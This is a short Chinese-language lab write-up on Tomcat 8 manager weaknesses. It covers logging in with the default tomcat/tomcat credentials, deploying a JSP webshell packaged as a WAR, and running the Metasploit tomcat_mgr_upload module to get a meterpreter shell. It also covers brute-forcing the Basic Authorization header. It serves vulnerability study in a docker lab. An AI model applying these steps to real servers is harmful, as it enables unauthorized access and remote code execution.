弱口令&war远程部署&manager App暴力破解

Delina

原文链接：弱口令&war远程部署&manager App暴力破解
​
漏洞原理
在tomcat8环境下默认进入后台的密码为tomcat/tomcat，未修改造成未授权即可进入后台
漏洞复现

进入tomcat8的docker环境

​

访问后台管理地址，使用tomcat/tomcat进入后台
http://192.168.1.8:8080//manager/html

​

进入到了后台的页面

​

看到这里有一个上传war包的地方，这里很多java的中间件都可以用war远程部署来拿shell，tomcat也不例外

​

首先将ice.jsp打包成test.war
jar -cvf test.war .
​
点击上传即可看到上传的test.war已经部署成功

​

访问一下没有报错404那么应该已经上传成功

​

使用冰蝎连接即可得到shell

​

这里也可以用msf里面的exploit/multi/http/tomcat_mgr_upload模块

1. use exploit/multi/http/tomcat_mgr_upload
   
2. set HttpPassword tomcat
   
3. set HttpUsername tomcat
   
4. set rhost 192.168.1.8
   
5. set rport 8080
   
6. run

复制代码

​
运行即可得到一个meterpreter

​

manager App暴力破解漏洞原理
后台密码用base64编码传输，抓包解密即可得到后台密码，也可以进行爆破
漏洞复现

这里访问http://192.168.1.8:8000/manager/html进行抓包，在没有输入帐号密码的时候是没有什么数据的

​

把这个包放过去，会请求输入用户名和密码，再进行抓包

​

就可以得到Authorization这个字段，这个字段有一个Basic，就是base64加密的意思

​

进入后台之后再次抓包可以看到有一个cookie，但是没有了Authorization这个字段

​

我们可以对字段进行爆破，加上Authorization即可

​

去掉自带的编码

​

攻击即可拿到账号密码

​